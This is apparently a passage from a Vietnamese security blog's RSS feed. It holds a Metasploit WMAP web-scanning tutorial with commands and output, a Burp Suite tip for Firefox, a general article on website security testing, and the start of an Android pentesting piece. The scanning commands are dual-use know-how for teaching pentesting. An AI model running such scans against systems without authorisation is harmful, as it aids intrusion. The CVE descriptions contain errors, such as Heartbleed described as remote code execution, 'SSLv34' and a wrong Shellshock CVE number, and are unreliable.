<p>Có vẻ như nó không được cập nhật trong 10 năm. Theo giải thích trong liên kết ở trên, WMAP sẽ sử dụng thông tin được lưu trữ trong cơ sở dữ liệu để tấn công mục tiêu của bạn một cách thông minh. Ngoài ra, bạn có thể tạo hồ sơ WMAP để sử dụng các mô-đun mới hơn hoặc thậm chí tùy chỉnh trong Metasploit &#8211; điều này làm cho WMAP có thể mở rộng và vẫn phù hợp ở hiện tại.</p>
<p>Đầu tiên, tải <code>wmap</code> và định cấu hình mục tiêu của bạn:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msf6 &gt; load wmap
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf6 &gt; wmap_sites -a http://192.168.1.5
[*] Site created.
msf6 &gt; wmap_targets -t http://192.168.1.5/drupal
msf6 &gt; wmap_targets -l
[*] Defined targets
===============
     Id  Vhost         Host          Port  SSL    Path
     --  -----         ----          ----  ---    ----
     0   192.168.1.5  192.168.1.5  80    false  /drupal</pre>
<p>Tiếp theo, chạy thử nghiệm đối với mục tiêu của bạn:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msf6 &gt; wmap_run -t
[*] Testing target:
[*] 	Site: 192.168.1.5 (192.168.1.5)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2021-08-08 04:43:27 +0000
[*] Loading wmap modules...
&lt;snipped&gt;</pre>
<p>Cuối cùng, chạy lệnh quét:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msf6 &gt; wmap_run -e 
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] 	Site: 192.168.1.5 (192.168.1.5)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2021-08-08 04:50:06 +0000
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[+] 192.168.1.5:80 Apache/2.4.7 (Ubuntu)
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
&lt;snipped&gt;</pre>
<h2>Sử dụng cấu hình WMAP tùy chỉnh</h2>
<p>Trong repo Metasploit Github có một số tài liệu hướng dẫn cách bạn có thể mở rộng WMAP để sử dụng các mô-đun khác bằng cách sử dụng cấu hình WMAP:</p>
<p><a class="au nk" href="https://github.com/rapid7/metasploit-framework/blob/master/data/wmap/wmap_sample_profile.txt" target="_blank" rel="noopener ugc nofollow">wmap_sample_profile.txt</a></p>
<p>Đây là file:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># 
# WMAP 1.0 Sample Profile
# wmap_run -e /path/to/profile
#
# Just add the name of the module. Use # for comments
#
frontpage
frontpage_login
options 
version 
backup_file 
#blind_sql_query 
#brute_dirs 
copy_of_file 
dir_listing 
dir_scanner
file_same_name_dir
writable</pre>
<p>Bạn có thể thấy từ các nhận xét trong tệp rằng bạn có thể mở rộng WMAP để sử dụng các mô-đun khác. Điều này làm cho WMAP thực sự hữu ích vì bạn có thể kiểm tra các mô-đun Metasploit mới hơn hoặc tùy chỉnh trên Web Server.</p>
<p>Vì vậy, như một ví dụ đơn giản, bạn có thể sử dụng cấu hình ví dụ đó, đặt nó vào <code>/tmp/wmap-profile</code> và sau đó chạy cấu hình WMAP bằng lệnh sau trong Metasploit:</p>
<p><code>msf6 &gt; wmap_run -e /tmp/wmap-profile</code></p>
<p>Như mình đã nói trước đó, việc này làm cho WMAP có thể mở rộng và có thể sẽ giữ nó mãi mãi hữu ích khi Rapid 7 tiếp tục tạo và cập nhật các mô-đun của Metasploit.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tôi có thể sử dụng Metasploit để quét lỗ hổng trên thiết bị di động không?</h3>
<p>Có, bạn có thể sử dụng Metasploit trên các thiết bị di động như điện thoại Android, tuy nhiên, hiệu suất có thể bị hạn chế bởi tài nguyên phần cứng.  Sử dụng các công cụ nhẹ và tối ưu hóa quá trình quét là rất quan trọng.</p>
<h3>Làm thế nào để tôi sử dụng Nmap với Metasploit để quét lỗ hổng?</h3>
<p>Bạn có thể sử dụng mô-đun <code>db_nmap</code> trong Metasploit.  Lệnh <code>msf6 > db_nmap -sV <địa_chỉ_IP></code> sẽ quét cổng và dịch vụ, nhập kết quả vào Metasploit để phân tích và khai thác.</p>
<h3>Metasploit có công cụ tích hợp để quét lỗ hổng ứng dụng web không?</h3>
<p>Có, Metasploit tích hợp WMAP (Web Application Mapper), một mô-đun quét lỗ hổng ứng dụng web.  Tuy nhiên, WMAP cần được tải thêm (<code>msf6 > load wmap</code>) và có thể cần cấu hình thêm để sử dụng hiệu quả.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-quet-lo-hong-bao-mat-bang-metasploit/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cách chặn &#8220;detectportal.firefox.com&#8221; khi dùng Burp Suite</title>
		<link>https://anonyviet.com/cach-chan-detectportal-firefox-com-khi-dung-burp-suite/</link>
					<comments>https://anonyviet.com/cach-chan-detectportal-firefox-com-khi-dung-burp-suite/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 29 Jul 2022 07:16:47 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Burp Suite]]></category>
		<category><![CDATA[kiểm thử website]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=42919</guid>

					<description><![CDATA[Khi dùng Burp Suite để bắt Request và Pentest hệ thống, nếu sử dụng FireFox bạn sẽ thường thấy Firefox gửi liên tục https://detectportal.firefox.com ra ngoài. Khi tìm trong Tab Proxy sẽ rất mất thời gian để lọc các link này ra. Trong bài này mình sẽ hướng dẫn bạn tắt tính năng gửi link [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Khi dùng Burp Suite để bắt Request và Pentest hệ thống, nếu sử dụng FireFox bạn sẽ thường thấy Firefox gửi liên tục https://detectportal.firefox.com ra ngoài. Khi tìm trong Tab Proxy sẽ rất mất thời gian để lọc các link này ra. Trong bài này mình sẽ hướng dẫn bạn tắt tính năng gửi link detportal.firefox.com của Firefox.</strong></p>
<h2>Cách chặn &#8220;detectportal.firefox.com&#8221; khi dùng Burp Suite</h2>
<p><a href="https://anonyviet.com/?s=burp+suite">Burp Suite</a> là công cụ để rà quét lỗ hổng Website được ưa chuộng nhất hiện nay. Khi dùng Burp Suite làm Proxy để bắt Request bạn thường sẽ dùng trình duyệt Firefox để thực hiện Pentest. Nhưng mỗi lần bắt Request bạn sẽ gặp phải dạng link https://detectportal.firefox.com/success.txt?ipv6 , https://detectportal.firefox.com/success.txt?ipv4 , https://detectportal.firefox.com/canonical.html. Việc này sẽ gây rốt và tốn thời gian tìm được link cần thực hiện Pentest. Để tắt tính năng Firefox Spam link detectportal.firefox.com do Burp Suite bắt được, bạn thực hiện như sau:</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/07/burp-suite-tat-spam-firefox.png"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/07/burp-suite-tat-spam-firefox.png" alt="chặn link detectportal.firefox.com burp suite" width="803" height="738" title="Cách chặn &quot;detectportal.firefox.com&quot; khi dùng Burp Suite 23"></a></p>
<p><strong>Bước 1:</strong> Mở Firefox lên, trên thanh Address gõ đường dẫn:  <code>about:config</code> để truy cập trang cấu hình của Firefox. Nhấn vào nút <strong>Accept the risk and continue</strong> để tiếp tục</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/07/firefox-abou-config-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/07/firefox-abou-config-1.jpg" alt="firefox about config" width="846" height="571" title="Cách chặn &quot;detectportal.firefox.com&quot; khi dùng Burp Suite 24"></a></p>
<p><strong>Bước 2:</strong> Tìm kiếm từ khóa.</p>
<p>Nhập &#8220;Captive&#8221; vào hộp tìm kiếm và đợi nó tải danh sách khớp với từ khóa.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/07/captive-chan-link-firefox-burp-suite-detectportal.firefox.com-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/07/captive-chan-link-firefox-burp-suite-detectportal.firefox.com-1.jpg" alt="captive chan link firefox burp suite detectportal.firefox.com" width="852" height="455" title="Cách chặn &quot;detectportal.firefox.com&quot; khi dùng Burp Suite 25"></a></p>
<p><strong>Bước 3:</strong> Tìm đến tên &#8220;network.captive-portal-service.enabled&#8221;, nếu đang ở giá trị <strong>True</strong> thì Double Click vào và chọn thành <strong>False</strong> (hoặc nhấn nút bật tắt ở bên phải để thay đổi giá trị thành “false”)</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/07/network.captive-portal-service.enabled-false-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/07/network.captive-portal-service.enabled-false-1.jpg" alt="network.captive-portal-service.enabled false" width="772" height="407" title="Cách chặn &quot;detectportal.firefox.com&quot; khi dùng Burp Suite 26"></a></p>
<p>Bây giờ bạn tắt Firefox mở khởi động lại, hãy thử mở Burp Suite và bắt Request của Website, trong Tab History bạn sẽ không còn thấy xuất hiện của các link https://detectportal.firefox.com/ nửa, như vậy sẽ giúp bạn tiết kiệm thời gian để vọc Website hơn. Nếu chưa biết sử dụng Burp Suite hãy xem bài <a href="https://anonyviet.com/web-pentest-bai-1-gioi-thieu-tong-quan-ve-burp-suite/">Web Pentest – Bài 1: Giới thiệu tổng quan về Burp Suite</a> để nắm căn bản về phần mềm này.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tại sao tôi thấy liên tục xuất hiện &#8220;detectportal.firefox.com&#8221; khi sử dụng Burp Suite với Firefox?</h3>
<p>Firefox tự động kiểm tra xem thiết bị của bạn có kết nối với mạng captive portal (ví dụ: mạng Wi-Fi công cộng yêu cầu đăng nhập) hay không.  Quá trình này tạo ra các yêu cầu đến `detectportal.firefox.com`, gây nhiễu khi sử dụng Burp Suite.</p>
<h3>Làm thế nào để ngăn chặn Firefox gửi yêu cầu đến &#8220;detectportal.firefox.com&#8221;?</h3>
<p>Bạn cần thay đổi một thiết lập trong cấu hình của Firefox.  Truy cập `about:config`, tìm kiếm &#8220;network.captive-portal-service.enabled&#8221; và đổi giá trị từ &#8220;true&#8221; sang &#8220;false&#8221;.</p>
<h3>Tôi cần khởi động lại Firefox hay Burp Suite sau khi thay đổi thiết lập?</h3>
<p>Chỉ cần khởi động lại trình duyệt Firefox là đủ. Sau khi khởi động lại, các yêu cầu đến `detectportal.firefox.com` sẽ không còn xuất hiện nữa.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-chan-detectportal-firefox-com-khi-dung-burp-suite/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kinh nghiệm khi Kiểm tra bảo mật Website</title>
		<link>https://anonyviet.com/kinh-nghiem-khi-kiem-tra-bao-mat-website/</link>
					<comments>https://anonyviet.com/kinh-nghiem-khi-kiem-tra-bao-mat-website/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 09 May 2022 05:54:13 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[bảo mật website]]></category>
		<category><![CDATA[khai thác lỗ hổng bảo mật]]></category>
		<category><![CDATA[kiểm thử xâm nhập]]></category>
		<category><![CDATA[kiểm tra bảo mật]]></category>
		<category><![CDATA[lỗ hổng bảo mật]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentester]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=41444</guid>

					<description><![CDATA[Khi nói đến bảo mật Website, chúng ta sẽ nghĩ đến các chuyên gia Pentester hay White Hat. Hacker ngày càng có kỹ năng cao hơn và việc chúng nhắm mục tiêu đến Website của bạn chỉ là vấn đề thời gian. Đó là lý do tại sao việc kiểm tra bảo mật Website thường [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Khi nói đến bảo mật Website, chúng ta sẽ nghĩ đến các chuyên gia Pentester hay White Hat. Hacker ngày càng có kỹ năng cao hơn và việc chúng nhắm mục tiêu đến Website của bạn chỉ là vấn đề thời gian. Đó là lý do tại sao việc kiểm tra bảo mật Website thường xuyên là rất quan trọng để đảm bảo rằng nó an toàn nhất có thể. Trong bài viết này, chúng ta sẽ nói về tầm quan trọng của việc kiểm tra bảo mật Website và cách thực hiện. Mình cũng sẽ giới thiệu một số lỗ hổng bảo mật nguy hiểm đã được tìm thấy trong các Website trong những năm qua và những công ty nào cung cấp dịch vụ kiểm tra bảo mật Website tốt nhất.</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/05/kinh-nghiem-khi-kiem-tra-bao-mat-website-1-1-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/05/kinh-nghiem-khi-kiem-tra-bao-mat-website-1-1-1.jpg" alt="kinh nghiem khi kiem tra bao mat website " width="523" height="362" title="Kinh nghiệm khi Kiểm tra bảo mật Website 28"></a></p>
<h2>Kiểm tra bảo mật Website là gì và các tính năng của nó là gì?</h2>
<p>Mục tiêu của kiểm tra bảo mật Website là để đánh giá tính bảo mật của một Website hoặc ứng dụng web. Đánh giá bảo mật Website có thể được sử dụng để xác định các lỗ hổng trong hệ thống và xác định liệu kẻ tấn công có thể khai thác các lỗ hổng đó để truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác hay không. Kiểm tra thâm nhập, kiểm tra mã và quét lỗ hổng bảo mật là ba trong số các quy trình kiểm tra bảo mật Website phổ biến nhất.</p>
<ul>
<li><a href="https://www.getastra.com/blog/security-audit/penetration-testing/" target="_blank" rel="noopener"><strong>Kiểm tra thâm nhập</strong></a> (còn được gọi là &#8220;Pentest&#8221;) là một trong những đánh giá bảo mật ứng dụng web được thực hiện thường xuyên nhất. Chúng liên quan đến việc sử dụng các công cụ tự động hoặc các kỹ thuật thủ công để cố gắng khai thác các điểm yếu trong hệ thống. Nếu thành công, điều này có thể cung cấp cho kẻ tấn công toàn quyền kiểm soát hệ thống và cho phép chúng truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác.</li>
<li><strong>Code reviews</strong> &#8211; đây là loại kiểm tra theo dạng White box, bạn đang cung cấp đầy đủ mã nguồn của Website để kiểm tra xem Code có lỗ hổng nào không. Đây là một loại kiểm tra thâm nhập yêu cầu kiểm tra thủ công mã nguồn của hệ thống để tìm các sai sót. Nó có thể tốn thời gian, nhưng nó thường đáng giá cao vì việc xem xét mã có thể phát hiện ra những sai sót mà các loại kiểm tra khác sẽ bỏ sót.</li>
<li><strong>Quét lỗ hổng bảo mật</strong> là một loại kiểm tra bảo mật Website phổ biến khác. Chúng liên quan đến việc sử dụng các công cụ tự động để quét hệ thống tìm các lỗ hổng đã biết. Đây thường là một cách nhanh chóng và dễ dàng để tìm ra các điểm yếu tiềm ẩn trong hệ thống, nhưng điều quan trọng cần lưu ý là không phải tất cả các lỗ hổng đều được máy quét lỗ hổng tìm thấy.</li>
</ul>
<h2>Tại sao Kiểm tra Bảo mật Website lại quan trọng?</h2>
<p>Điều quan trọng là phải tiến hành kiểm tra bảo mật Website vì nó giúp bạn phát hiện ra các lỗ hổng trong hệ thống của mình trước khi kẻ tấn công thực hiện. Bằng cách phát hiện và sửa chữa những lỗ hổng này, bạn có thể làm cho Website an toàn hơn trước Hacker. Ngoài ra, kiểm tra bảo mật Website cũng có thể giúp bạn đáp ứng các yêu cầu tuân thủ, chẳng hạn như các yêu cầu do Ngành thẻ thanh toán (PCI) đặt ra cho các Website xử lý thanh toán bằng thẻ tín dụng.</p>
<h2>Điều gì xảy ra nếu Kiểm tra Bảo mật Website không được thực hiện thường xuyên</h2>
<p>Nếu kiểm tra bảo mật Website không được thực hiện, thì rất có thể các lỗ hổng sẽ không được chú ý và chưa được vá. Điều này có nghĩa là những kẻ tấn công sẽ có thời gian dễ dàng hơn khi khai thác những điểm yếu này và giành quyền truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác. Ngoài ra, nếu kiểm tra bảo mật Website không được thực hiện thường xuyên, thì các lỗ hổng bảo mật mới có thể xuất hiện theo thời gian khi các tính năng mới được thêm vào hệ thống hoặc phần mềm mới được cài đặt.</p>
<h2>Cách kiểm tra bảo mật Website &#8211; Các bước:</h2>
<p>Bây giờ chúng ta đã xem xét kiểm tra bảo mật Website là gì và tại sao nó lại quan trọng, hãy cùng xem <a href="https://www.getastra.com/blog/security-audit/web-application-security-testing/" target="_blank" rel="noopener">cách kiểm tra bảo mật Website</a>. Nói chung, có bốn bước mà bạn sẽ cần làm theo:</p>
<p>Bây giờ chúng ta đã xem xét kiểm tra bảo mật Website là gì và tại sao nó lại quan trọng, hãy cùng xem cách kiểm tra bảo mật Website. Nói chung, có bốn bước mà bạn sẽ cần làm theo:</p>
<h3>Lập kế hoạch kiểm tra</h3>
<p>Bước đầu tiên trong kiểm tra bảo mật Website là lập kế hoạch kiểm tra của bạn. Điều này liên quan đến việc quyết định loại thử nghiệm bạn muốn chạy, phạm vi bạn muốn thử nghiệm và những tài nguyên nào bạn sẽ cần.</p>
<p>Có một số loại kiểm tra bảo mật Website khác nhau, mặc dù những loại kiểm tra thường xuyên nhất bao gồm kiểm tra thâm nhập, đánh giá mã (review code) và quét lỗ hổng bảo mật. Bạn cũng sẽ cần chọn một phạm vi cho thử nghiệm của mình. Điều này có nghĩa là quyết định hệ thống và ứng dụng nào bạn muốn kiểm tra và những hệ thống và ứng dụng nào bạn muốn loại trừ.</p>
<p>Cuối cùng, bạn sẽ cần thu thập các tài nguyên cần thiết cho bài kiểm tra của mình. Điều này bao gồm những thứ như công cụ kiểm tra, tài liệu và bất kỳ tài liệu cần thiết nào khác.</p>
<h3>Chuẩn bị</h3>
<p>Giai đoạn tiếp theo là chuẩn bị cho việc kiểm tra của bạn như thiết lập môi trường thử nghiệm và đảm bảo tất cả các công cụ và tài liệu cần thiết đều có sẵn.</p>
<p>Để bắt đầu, bạn cần xây dựng thiết lập thử nghiệm của mình như một môi trường thử nghiệm riêng biệt bị ngắt kết nối với môi trường thật. Điều này rất quan trọng vì nó đảm bảo rằng bất kỳ thay đổi hoặc sửa đổi nào được thực hiện trong quá trình thử nghiệm không ảnh hưởng đến các hệ thống đang hoạt động.</p>
<p>Do đó, bạn sẽ cần thu thập các thiết bị và thủ tục giấy tờ cần thiết. Điều này bao gồm những thứ như công cụ thử nghiệm, trường hợp thử nghiệm và bất kỳ tài liệu liên quan nào khác.</p>
<p>Cuối cùng, bạn sẽ cần phải lập một kế hoạch kiểm tra cùng nhau. Tài liệu này phải phác thảo các mục tiêu của thử nghiệm, phạm vi thử nghiệm và các nguồn lực mà bạn sẽ cần.</p>
<h3>Kiểm tra hệ thống</h3>
<p>Khi mọi thứ đã chuẩn bị xong, bạn có thể bắt đầu thực hiện các bài kiểm tra của mình. Điều này liên quan đến việc chạy bài test hệ thống đã chọn và ghi lại kết quả.</p>
<p>Có nhiều loại kiểm tra bảo mật Website khác nhau, nhưng kiểm tra thâm nhập, đánh giá mã và quét lỗ hổng bảo mật là những loại phổ biến nhất.</p>
<p>Các bài kiểm tra thâm nhập được sử dụng để mô phỏng các cuộc tấn công trong thế giới thực và xác định các lỗ hổng có thể bị khai thác bởi những kẻ tấn công.</p>
<p>Đánh giá mã được sử dụng để kiểm tra mã nguồn của các ứng dụng và xác định các điểm yếu tiềm ẩn về bảo mật.</p>
<p>Quét lỗ hổng bảo mật được sử dụng để quét các hệ thống và ứng dụng để tìm các lỗ hổng đã biết.</p>
<h4>Báo cáo</h4>
<p>Cuối cùng, bạn sẽ cần báo cáo về những phát hiện của mình. Điều này liên quan đến việc viết một báo cáo về những phát hiện của bạn và trình bày nó cho các bên liên quan có liên quan.</p>
<p>Báo cáo của bạn nên bao gồm bản tóm tắt các phát hiện của bạn, cũng như chi tiết về bất kỳ lỗ hổng bảo mật nào đã được xác định. Điều quan trọng cần lưu ý là không phải tất cả các lỗ hổng đều nghiêm trọng và bạn nên ưu tiên chúng dựa trên mức độ nghiêm trọng của chúng.</p>
<p>Bạn cũng nên bao gồm các khuyến nghị để khắc phục, là các hành động có thể được thực hiện để giải quyết các lỗ hổng bảo mật đã được xác định.</p>
<h2>Một số lỗ hổng chính được tìm thấy thông qua kiểm tra bảo mật Website là gì?</h2>
<p>Đã có nhiều lỗ hổng chính được tìm thấy thông qua kiểm tra bảo mật Website trong những năm qua. Một số trong những cái đáng chú ý nhất bao gồm:</p>
<p>&#8211; <strong>Heartbleed (CVE-2014-0160)</strong>: Đây là một lỗ hổng nghiêm trọng trong thư viện phần mềm OpenSSL đã ảnh hưởng đến nhiều Website và ứng dụng web. Nó cho phép những kẻ tấn công thực thi mã từ xa trên các hệ thống đang chạy các phiên bản OpenSSL dễ bị tấn công.</p>
<p>&#8211; <strong>Poodle (CVE-2014-3566)</strong>: Đây là một lỗ hổng nghiêm trọng trong SSLv34 đã ảnh hưởng đến nhiều Website và ứng dụng web. Nó cho phép những kẻ tấn công giải mã từ xa lưu lượng được cho là được mã hóa bởi SSLv34.</p>
<p>&#8211; <strong>Shellshock (CVE-2014-2716)</strong>: Đây là một lỗ hổng nghiêm trọng trong Bash shell ảnh hưởng đến nhiều Website và ứng dụng web.</p>
<p>&#8211; <strong>GHOST (CVE-2015-0235)</strong>: Đây là một lỗ hổng nghiêm trọng trong thư viện glibc đã ảnh hưởng đến nhiều Website và ứng dụng web.</p>
<h2>Công ty nào cung cấp thử nghiệm bảo mật Website?</h2>
<p>Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website. Một số công ty nổi tiếng như:</p>
<ul>
<li>WhiteHat Security: WhiteHat Security là nhà cung cấp dịch vụ kiểm tra bảo mật Website hàng đầu.</li>
<li>Astra&#8217;s Pentest: Astra&#8217;s Pentest là một nhà cung cấp dịch vụ kiểm tra bảo mật Website phổ biến khác. Họ cung cấp cả thử nghiệm tự động và thủ công, cũng như thử nghiệm thâm nhập mạng và thiết bị di động với mức giá khá hợp lý.</li>
<li>RapidScan: RapidScan là nhà cung cấp hàng đầu các dịch vụ kiểm tra bảo mật Website tự động. Các chuyên gia bảo mật thực hiện kiểm tra kỹ lưỡng lỗ hổng bảo mật, tích hợp tường lửa ứng dụng web an toàn, v.v.</li>
<li>Nessus: Nessus là nhà cung cấp dịch vụ quét lỗ hổng bảo mật phổ biến. Kiểm tra thâm nhập dựa trên web và đánh giá bảo mật có sẵn.</li>
<li>Veracode: Một nhà cung cấp dịch vụ kiểm tra bảo mật Website nổi bật khác là Veracode. Họ cung cấp cả xác minh tĩnh và động.</li>
<li>Qualys: Qualys là nhà cung cấp hàng đầu về các giải pháp quản lý lỗ hổng bảo mật và tuân thủ. Họ cung cấp nhiều loại sản phẩm, bao gồm quét ứng dụng web, có thể được sử dụng để kiểm tra các lỗ hổng trong các Website và ứng dụng web.</li>
</ul>
<h2>Các tính năng hàng đầu của các công ty kiểm tra bảo mật Website là gì?</h2>
<p>Khi chọn một công ty kiểm tra bảo mật Website, bạn cần lưu ý các vấn đề sau:</p>
<ul>
<li>Kiểm tra tự động hoặc thủ công: Một số công ty chỉ cung cấp kiểm tra tự động, trong khi những công ty khác cũng cung cấp kiểm tra thủ công.</li>
<li>Thử nghiệm tĩnh hoặc động: Một số công ty chỉ cung cấp thử nghiệm tĩnh, trong khi những công ty khác cũng cung cấp thử nghiệm động.</li>
<li>Dịch vụ bảo mật đa dạng: Một số công ty chỉ cung cấp thử nghiệm bảo mật Website, trong khi những công ty khác cũng cung cấp một loạt các dịch vụ bảo mật khác. Nếu bạn muốn được bảo vệ toàn diện nhất có thể, thì bạn nên chọn một công ty cung cấp nhiều dịch vụ bảo vệ.</li>
</ul>
<p>Bạn có thể chắc chắn thuê doanh nghiệp kiểm tra bảo mật Website tốt nhất cho nhu cầu của mình nếu bạn ghi nhớ những đặc điểm này.</p>
<h2>Lời kết</h2>
<p>Kiểm tra bảo mật Website của bạn là điều quan trọng để đảm bảo an toàn cho dữ liệu của bạn và dữ liệu của người dùng. Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website, vì vậy hãy đảm bảo chọn một công ty cung cấp các tính năng bạn cần.</p>
<p>Nếu bạn không tiến hành kiểm tra bảo mật một cách thường xuyên, bạn đang tự đặt mình vào rủi ro. Các lỗ hổng mới liên tục được phát hiện và nếu bạn không kiểm tra chúng, thì bạn có thể là nạn nhân tiếp theo. Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website, vì vậy hãy đảm bảo chọn một công ty phù hợp với nhu cầu của bạn.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Kiểm tra bảo mật website có thực sự cần thiết không?</h3>
<p>Hoàn toàn cần thiết! Kiểm tra bảo mật giúp phát hiện và vá các lỗ hổng trước khi hacker tấn công, bảo vệ dữ liệu và danh tiếng website của bạn.  Việc này cũng giúp đáp ứng các yêu cầu tuân thủ về bảo mật.</p>
<h3>Tôi nên kiểm tra bảo mật website thường xuyên như thế nào?</h3>
<p>Tần suất kiểm tra phụ thuộc vào độ phức tạp của website và mức độ nhạy cảm của dữ liệu.  Tuy nhiên, ít nhất nên thực hiện định kỳ hàng năm, hoặc thường xuyên hơn nếu có cập nhật lớn về phần mềm hoặc tính năng.</p>
<h3>Những loại kiểm tra bảo mật website phổ biến là gì?</h3>
<p>Ba loại phổ biến gồm: Kiểm tra thâm nhập (Pentest), đánh giá mã nguồn (Code review) và quét lỗ hổng bảo mật. Mỗi loại đều có ưu điểm riêng và thường được kết hợp để đảm bảo hiệu quả tối đa.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/kinh-nghiem-khi-kiem-tra-bao-mat-website/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cách Pentest ứng dụng Android trên Windows 11 bằng WSA</title>
		<link>https://anonyviet.com/cach-pentest-ung-dung-android-tren-windows-11-bang-wsa/</link>
					<comments>https://anonyviet.com/cach-pentest-ung-dung-android-tren-windows-11-bang-wsa/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Sat, 01 Jan 2022 23:29:40 +0000</pubDate>
				<category><![CDATA[Phần mềm điện thoại]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[windows 11]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=38296</guid>

					<description><![CDATA[Nhiều người cho rằng cách tốt nhất để pentest ứng dụng Android là kết nối trực tiếp điện thoại Android với PC hoặc Mac và debug. Sự kết hợp này cung cấp rất nhiều tùy chọn kiểm soát để pentest và đối với nhiều trường hợp, nó sẽ tối ưu hơn các trình giả lập [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Nhiều người cho rằng cách tốt nhất để pentest ứng dụng Android là kết nối trực tiếp điện thoại Android với PC hoặc Mac và debug. Sự kết hợp này cung cấp rất nhiều tùy chọn kiểm soát để pentest và đối với nhiều trường hợp, nó sẽ tối ưu hơn các trình giả lập Android điển hình.</p>
<p>Ngay cả khi bạn không có quyền truy cập vào nhiều thiết bị, thì thiết bị ảo (AVD) tích hợp sẵn của Android Studio thường là lựa chọn phù hợp cho các công việc pentest như vậy. Có thể root AVD và nó tích hợp hoàn hảo với debuger, vì vậy mọi thứ đều hoạt động tốt. Nhưng nếu bạn đang chạy Windows 11 và bạn muốn pentest ứng dụng Android, thì bạn có thể dễ dàng làm vậy mà không cần dựa vào trình giả lập hoặc máy ảo, nhờ sự hỗ trợ của <a href="https://anonyviet.com/cai-windows-subsystem-for-android-de-choi-game-android-tren-windows-11/">Windows Subsystem for Android (WSA).</a></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/12/Subsystem-for-Android-option-2.jpg" alt="Cách pentest ứng dụng Android trên Windows 11 bằng WSA" width="900" height="600" title="Cách Pentest ứng dụng Android trên Windows 11 bằng WSA 32"></p>
<h2>Cách pentest ứng dụng Android trên Windows 11 bằng WSA</h2>
<p>Theo Michael Higgo từ <a href="https://orangecyberdefense.com/" target="_blank" rel="noopener">Orange Cyberdefense</a>, người ta có thể sử dụng WSA để kiểm tra bảo mật Android theo cách tương tự như trên thiết bị Android vật lý. Higgo, Nhà phân tích bảo mật hàng đầu tại SensePost, gần đây đã đăng một bài viết trên blog với một số chi tiết chung về cách tiến hành kiểm tra bảo mật ứng dụng Android trên WSA.</p>
<p>Khi đánh giá tình trạng bảo mật của ứng dụng Android, việc sử dụng bộ công cụ khai thác thời gian chạy trên thiết bị di động như Objection kết hợp với Windows Subsystem for Android khiến công việc trở nên khá hợp lý đối với một nhà nghiên cứu bảo mật.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/12/WSA-objection-hooking.jpg" alt="Cách Pentest ứng dụng Android trên Windows 11 bằng WSA 5" width="900" height="248" title="Cách Pentest ứng dụng Android trên Windows 11 bằng WSA 33"></p>
